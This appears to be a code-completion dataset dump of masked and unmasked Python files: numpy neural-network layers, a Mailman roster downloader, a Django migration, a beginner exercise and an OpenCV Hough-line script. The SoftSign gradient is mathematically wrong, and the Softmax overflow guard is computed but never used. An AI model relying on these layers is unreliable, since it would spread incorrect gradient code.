self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Layer:\n <mask token>\n\n @property\n def need_update(self):\n return False\n\n\nclass FC(Layer):\n\n def __init__(self, W, b, lr, decay, epoch_drop, l2=0):\n self.W = W.copy()\n self.b = b.copy()\n self.alpha_0 = lr\n self.decay = decay\n self.epoch_drop = epoch_drop\n self.l2 = l2\n self.count = 0\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * self.decay ** np.floor((1 + self.count) /\n self.epoch_drop)\n self.count += 1\n return lrate\n\n def update(self):\n lr = self.l_rate()\n self.W -= lr * self.grad_W\n self.b -= lr * self.grad_b\n\n @property\n def need_update(self):\n return True\n\n\nclass Sigmoid(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
"step-5": "import numpy as np\n\n\nclass Layer:\n def __init__(self):\n pass\n\n @property\n def need_update(self):\n return False\n\n\nclass FC(Layer):\n def __init__(self, W, b, lr, decay, epoch_drop, l2=0):\n self.W = W.copy()\n self.b = b.copy()\n self.alpha_0 = lr\n self.decay = decay\n self.epoch_drop = epoch_drop\n self.l2 = l2\n self.count = 0\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * \\\n (self.decay ** (np.floor((1 + self.count) / self.epoch_drop)))\n self.count += 1\n return lrate\n\n def update(self):\n lr = self.l_rate()\n self.W -= lr * self.grad_W\n self.b -= lr * self.grad_b\n\n @property\n def need_update(self):\n return True\n\n\nclass Sigmoid(Layer):\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n def forward(self, x, y):\n self.x = (x.copy() - x.max(axis=1).reshape(-1, 1))\n # Avoiding overflow of exp(),\n # This operation doesn't change the output of CE\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] -\n self.dirac(j, self.y[i])) / self.m\n return grad\n\n\ndef get_act_func(layer_name):\n activation_function_dict = {\n \"arctan\": Arctan,\n \"l_relu\": Leaky_Relu,\n \"relu\": Relu,\n \"sigmoid\": Sigmoid,\n \"tanh\": Tanh,\n \"softplus\": SoftPlus,\n \"softsign\": SoftSign\n }\n return activation_function_dict[layer_name]()\n",
"step-ids": [
19,
29,
32,
34,
38
]
}
|
[
19,
29,
32,
34,
38
] |
import messages
import os
import requests
from bs4 import BeautifulSoup
URL = "https://mailman.kcl.ac.uk/mailman/"
ADMIN = "admin/"
ROSTER = "roster/"
OUTPUT_FOLDER = "../output/"
def makeoutput(path):
if os.path.exists(path):
pass
else:
os.mkdir(path)
def mailinglist_cookies(mailinglist, password): # this opens up the admin page, enters the password, and saves the returned cookie to be passed to the next request
try:
cookie_request = requests.post(URL+ ADMIN + mailinglist, data = {'adminpw':password})
cookie_request.raise_for_status()
return cookie_request.cookies
except: # raises exception if the password is incorrect (or any other 4XX error)
print(messages.error_message)
return None
def make_roster(mailinglist, cookies): # takes the cookie from the cookie request and requests the roster
roster_request = requests.get(URL+ ROSTER + mailinglist, cookies = cookies)
roster_soup = BeautifulSoup(roster_request.text,'html.parser')
roster_result_set = roster_soup.find_all('a')[:-4] # the last 4 links on the page are admin links
roster = []
for r in roster_result_set:
roster.append(r.text.replace(' at ','@')) #the mailman list inexplicably uses a stupid ' at ' display format
return roster
def main():
makeoutput(OUTPUT_FOLDER)
print(messages.welcome_message)
while True:
mailinglist = input("What's the name of the mailing list you want to download?> ")
password = input("What is the list admin password?> ")
filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'
cookies = mailinglist_cookies(mailinglist, password)
if cookies != None:
roster = make_roster(mailinglist, cookies)
for count, email in enumerate(roster,1):
print(count,"/",len(roster))
with open(filename, 'a') as output:
output.write(email + ';\n')
print("Saved", len(roster), "email addresses in", os.path.abspath(filename))
input("press enter to close")
break
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "0e337ce21450e0fdb7688183d0542ebf902a9614",
"index": 1293,
"step-1": "<mask token>\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nURL = 'https://mailman.kcl.ac.uk/mailman/'\nADMIN = 'admin/'\nROSTER = 'roster/'\nOUTPUT_FOLDER = '../output/'\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import messages\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nURL = 'https://mailman.kcl.ac.uk/mailman/'\nADMIN = 'admin/'\nROSTER = 'roster/'\nOUTPUT_FOLDER = '../output/'\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\nimport messages\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://mailman.kcl.ac.uk/mailman/\"\nADMIN = \"admin/\"\nROSTER = \"roster/\"\nOUTPUT_FOLDER = \"../output/\"\n\ndef makeoutput(path):\t\n\tif os.path.exists(path):\n\t\tpass\n\telse:\n\t\tos.mkdir(path)\n\ndef mailinglist_cookies(mailinglist, password): # this opens up the admin page, enters the password, and saves the returned cookie to be passed to the next request\n\ttry:\n\t\tcookie_request = requests.post(URL+ ADMIN + mailinglist, data = {'adminpw':password})\n\t\tcookie_request.raise_for_status()\n\t\treturn cookie_request.cookies \n\texcept: # raises exception if the password is incorrect (or any other 4XX error)\n\t\tprint(messages.error_message)\n\t\treturn None\n\ndef make_roster(mailinglist, cookies): # takes the cookie from the cookie request and requests the roster\n\troster_request = requests.get(URL+ ROSTER + mailinglist, cookies = cookies)\n\troster_soup = BeautifulSoup(roster_request.text,'html.parser')\n\troster_result_set = roster_soup.find_all('a')[:-4] # the last 4 links on the page are admin links\n\troster = []\n\tfor r in roster_result_set:\n\t\troster.append(r.text.replace(' at ','@')) #the mailman list inexplicably uses a stupid ' at ' display format\n\n\treturn roster\n\ndef main():\n\t\n\tmakeoutput(OUTPUT_FOLDER)\t\n\tprint(messages.welcome_message)\t\n\n\twhile True:\t\t\n\t\tmailinglist = input(\"What's the name of the mailing list you want to download?> \")\n\t\tpassword = input(\"What is the list admin password?> \")\n\t\tfilename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n\n\t\tcookies = mailinglist_cookies(mailinglist, password)\n\t\tif cookies != None:\n\t\t\troster = make_roster(mailinglist, cookies)\t\t\n\t\t\tfor count, email in enumerate(roster,1):\n\t\t\t\t\n\t\t\t\tprint(count,\"/\",len(roster))\n\n\t\t\t\twith open(filename, 'a') as output:\n\t\t\t\t\toutput.write(email + ';\\n')\n\t\t\t\n\t\t\tprint(\"Saved\", len(roster), \"email addresses in\", os.path.abspath(filename))\n\t\t\tinput(\"press enter to close\")\n\t\t\tbreak\t\t\n\nif __name__ == '__main__':\n\tmain()",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# Generated by Django 3.0.4 on 2020-03-27 11:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('web', '0005_remove_product_image'),
]
operations = [
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('price', models.FloatField()),
('duration_till', models.DateField()),
('total_amount', models.FloatField()),
('buyer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consumer', to=settings.AUTH_USER_MODEL)),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
normal
|
{
"blob_id": "c10e1cf2f1ce5b11d19ddddbfc3dc9652d830a3c",
"index": 1132,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('web', '0005_remove_product_image')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(primary_key=True, serialize=False)), ('price',\n models.FloatField()), ('duration_till', models.DateField()), (\n 'total_amount', models.FloatField()), ('buyer', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, related_name=\n 'consumer', to=settings.AUTH_USER_MODEL)), ('seller', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings\n .AUTH_USER_MODEL))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('web', '0005_remove_product_image')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(primary_key=True, serialize=False)), ('price',\n models.FloatField()), ('duration_till', models.DateField()), (\n 'total_amount', models.FloatField()), ('buyer', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, related_name=\n 'consumer', to=settings.AUTH_USER_MODEL)), ('seller', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings\n .AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 3.0.4 on 2020-03-27 11:42\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('web', '0005_remove_product_image'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('price', models.FloatField()),\n ('duration_till', models.DateField()),\n ('total_amount', models.FloatField()),\n ('buyer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consumer', to=settings.AUTH_USER_MODEL)),\n ('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
work_hours = 8
work_days = 5
pay_periods = 2
total = work_hours * work_days * pay_periods
rate = 17
pay = total * rate
print(pay)
# variables
name = "josh"
age = 30
# float
weight = 160.5
# list
kill_streak = [3, 5, 1, 9] # [90.9] list can contain sub lists
# range
players = list(range(1,10))
odds = list(range(1, 10, 2))
print(odds)
print(type(name), type(age), type(weight), type(kill_streak))
# dir(str)
# attributes
# help(str.upper)
# dir(__builtins__)
kill_streak_sum = sum(kill_streak)
length = len(kill_streak)
mean = kill_streak_sum / length
print(mean)
student_grades = [9.1, 8.8, 10.0, 7.7, 6.8, 8.0, 10.0, 8.1, 10.0, 9.9]
tens = student_grades.count(10)
print(tens)
# dictionary (key:value)
family = {"josh": 30, "jess": 31, "bailey": 1.5}
age_sum = sum(family.values())
family_size = len(family)
average_age = age_sum / family_size
print(average_age)
# Tuple like a dictionary but non-mutable
palette_one = ("#f1f1f1", "#333333", "#4287f5")
palette_two = ("#f5f5f5", "#454545", "#6dd46a")
palette_three = ("#f0fff0", "#c7c7c7", "#725fb0")
palettes = (palette_one, palette_two, palette_three)
color_codes = palettes
temperature_data = {"morning": (3.1, 2.0, 4.9), "noon": (1.2, 0.9, 3.4), "evening": (0.2, 0.1, 1.0)}
day_temperatures = temperature_data
|
normal
|
{
"blob_id": "af2ef3c77cefe675f3d30c3234401f0f9bda3505",
"index": 8916,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(pay)\n<mask token>\nprint(odds)\nprint(type(name), type(age), type(weight), type(kill_streak))\n<mask token>\nprint(mean)\n<mask token>\nprint(tens)\n<mask token>\nprint(average_age)\n<mask token>\n",
"step-3": "work_hours = 8\nwork_days = 5\npay_periods = 2\ntotal = work_hours * work_days * pay_periods\nrate = 17\npay = total * rate\nprint(pay)\nname = 'josh'\nage = 30\nweight = 160.5\nkill_streak = [3, 5, 1, 9]\nplayers = list(range(1, 10))\nodds = list(range(1, 10, 2))\nprint(odds)\nprint(type(name), type(age), type(weight), type(kill_streak))\nkill_streak_sum = sum(kill_streak)\nlength = len(kill_streak)\nmean = kill_streak_sum / length\nprint(mean)\nstudent_grades = [9.1, 8.8, 10.0, 7.7, 6.8, 8.0, 10.0, 8.1, 10.0, 9.9]\ntens = student_grades.count(10)\nprint(tens)\nfamily = {'josh': 30, 'jess': 31, 'bailey': 1.5}\nage_sum = sum(family.values())\nfamily_size = len(family)\naverage_age = age_sum / family_size\nprint(average_age)\npalette_one = '#f1f1f1', '#333333', '#4287f5'\npalette_two = '#f5f5f5', '#454545', '#6dd46a'\npalette_three = '#f0fff0', '#c7c7c7', '#725fb0'\npalettes = palette_one, palette_two, palette_three\ncolor_codes = palettes\ntemperature_data = {'morning': (3.1, 2.0, 4.9), 'noon': (1.2, 0.9, 3.4),\n 'evening': (0.2, 0.1, 1.0)}\nday_temperatures = temperature_data\n",
"step-4": "work_hours = 8\r\nwork_days = 5\r\npay_periods = 2\r\ntotal = work_hours * work_days * pay_periods\r\nrate = 17\r\npay = total * rate\r\n\r\nprint(pay)\r\n\r\n# variables\r\nname = \"josh\"\r\nage = 30\r\n# float\r\nweight = 160.5\r\n# list\r\nkill_streak = [3, 5, 1, 9] # [90.9] list can contain sub lists\r\n# range\r\nplayers = list(range(1,10))\r\nodds = list(range(1, 10, 2))\r\nprint(odds)\r\n\r\nprint(type(name), type(age), type(weight), type(kill_streak))\r\n\r\n# dir(str)\r\n# attributes\r\n# help(str.upper)\r\n\r\n# dir(__builtins__)\r\n\r\nkill_streak_sum = sum(kill_streak)\r\nlength = len(kill_streak)\r\nmean = kill_streak_sum / length\r\n\r\nprint(mean)\r\n\r\nstudent_grades = [9.1, 8.8, 10.0, 7.7, 6.8, 8.0, 10.0, 8.1, 10.0, 9.9]\r\ntens = student_grades.count(10)\r\n\r\nprint(tens)\r\n\r\n# dictionary (key:value)\r\nfamily = {\"josh\": 30, \"jess\": 31, \"bailey\": 1.5}\r\nage_sum = sum(family.values())\r\nfamily_size = len(family)\r\naverage_age = age_sum / family_size\r\n\r\nprint(average_age)\r\n\r\n# Tuple like a dictionary but non-mutable\r\npalette_one = (\"#f1f1f1\", \"#333333\", \"#4287f5\")\r\npalette_two = (\"#f5f5f5\", \"#454545\", \"#6dd46a\")\r\npalette_three = (\"#f0fff0\", \"#c7c7c7\", \"#725fb0\")\r\npalettes = (palette_one, palette_two, palette_three)\r\n\r\ncolor_codes = palettes\r\n\r\ntemperature_data = {\"morning\": (3.1, 2.0, 4.9), \"noon\": (1.2, 0.9, 3.4), \"evening\": (0.2, 0.1, 1.0)}\r\nday_temperatures = temperature_data\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
## 허프변환에 의한 직선 검출
# cv2.HoughLines(image, rho, theta, threshold, lines=None, srn=None, stn=None, min-theta=None, max-theta=None) => lines
# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)
# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)
# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)
# rho, theta 값이 커지면 축적배열의 크기는 작아지고, 값이 작으면 축적배열은 커진다.
# 축적배열이 크면 정교한 직선을 표현할 수 있으나, 연산량이 많아진다.
# 축적배열이 작아면 정밀한 직선을 표현할 수 없으나, 연산량이 적어 속도는 빠르다.
# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.
# lines : rho, theta 값을 담고 있는 3차원 행렬(numpy.ndarray) 형태로 리턴된다.
# rho, theta를 행렬로 표현한다고 하면 rho, theta 2개만 있으면 되는데
# c++에서 파이썬으로 넘어오면서 쓸데없는 값이 추가되었다.
# lines 의 shape은 (N, 1, 2), dtype = numpy.float32 **shape 주의할 것
# 가운데 1이 의미없는 값. 그래서 나중에 코드화할 때 [0]을 집어넣으면 된다.
# rho, theta값은 우리가 알아보기 힘들다.
## 확률적 허프 변환
# cv2.HoughLinesP(image, rho, theta, threshold, lines=None, minLineLength=None, maxLineGap=None)
# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)
# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)
# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)
# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.
# lines : 선분의 시작과 끝 좌표(x1, y1, x2, y2) 정보를 담고 있는 numpy.ndarray
# shape=(N, 1, 4), dtype = numpy.int32
# minLineLength : 검출하기 위한 선분의 최소 길이. (최소길이에 못미치면 검출X)
# maxLineGap : 직선으로 간주하기 위한 최대 에지 점 간격. 기본값 0
# 기본값이 0일 때는, _ _ 이렇게 에지에 간격이 있으면 하나의 직선으로 보지 않고,
# 이 값을 4로 줬을 때는, __ _ __ ___ 이렇게 간격이 3개 있어도 하나의 직선으로 본다.
import sys, cv2, numpy as np
# src = cv2.imread('./images/bd.png', cv2.IMREAD_GRAYSCALE)
src = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)
if src is None:
print('Image load failed')
sys.exit()
edges = cv2.Canny(src, 50, 150)
lines = cv2.HoughLinesP(edges, 1, np.pi/180.0, 150, minLineLength=50, maxLineGap=5) # threshold값 ↑적게검출 ↓많이검출
# 색을 칠해서 선분을 표현할 거니까 해당 edge를 BGR로 바꿔줘야함. Canny()하면 grayscale됨.
dst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)
if lines is not None:
for i in range(lines.shape[0]): # N개 검출됨. N의 값은 알 수 없다.
pt1 = (lines[i][0][0], lines[i][0][1]) # 시작점 좌표, 가운데 값은 무조건 0으로
pt2 = (lines[i][0][2], lines[i][0][3]) # 끝점 좌표, 가운데 값은 무조건 0으로
cv2.line(dst, pt1, pt2, (0,255,0), 2, cv2.LINE_AA)
cv2.imshow('src',src)
cv2.imshow('edges',edges)
cv2.imshow('dst',dst)
cv2.waitKey()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "ff7cb8261f3abb70599725fe7c598c571d037226",
"index": 9535,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif src is None:\n print('Image load failed')\n sys.exit()\n<mask token>\nif lines is not None:\n for i in range(lines.shape[0]):\n pt1 = lines[i][0][0], lines[i][0][1]\n pt2 = lines[i][0][2], lines[i][0][3]\n cv2.line(dst, pt1, pt2, (0, 255, 0), 2, cv2.LINE_AA)\ncv2.imshow('src', src)\ncv2.imshow('edges', edges)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()\n",
